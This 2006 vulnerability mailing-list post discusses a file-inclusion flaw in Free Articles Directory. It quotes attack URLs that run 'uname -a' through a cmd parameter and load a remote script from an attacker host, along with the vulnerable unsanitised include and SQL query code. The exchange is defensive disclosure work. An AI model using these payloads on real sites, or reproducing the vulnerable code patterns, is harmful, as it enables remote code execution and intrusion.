[VIM] Free Articles Directory - file inclusion, code execution?
Josh Zlatin
jzlatin at ramat.cc
Wed Mar 22 07:46:38 EST 2006
On Wed, 22 Mar 2006, security curmudgeon wrote:
>
> http://archives.neohapsis.com/archives/bugtraq/2006-03/0396.html
>
> Original disclosure isn't very clear, but the sample looks like it is passing
> arbitrary commands to be executed:
>
> http://[target]/index.php?page=evilcode?&cmd=uname -a
>
> http://www.secunia.com/advisories/19320/
>
> Secunia is calling this local/remote file inclusion. Clarification or
> different issue?
Looks to me like a clarification, meaning:
http://[target]/index.php?page=http://[attacker]/evilscript
opens and runs the php script (note the following code in index.php
though: include($_GET["page"].".php");
I was unable to run uname -a or any other command I tried via the cmd
command, but that is probably because the 'cmd' variable is defined as
the result of the following SQL query:
SELECT * FROM document_master where doc_title='".$_GET["pagedb"].
--
- Josh
More information about the VIM
mailing list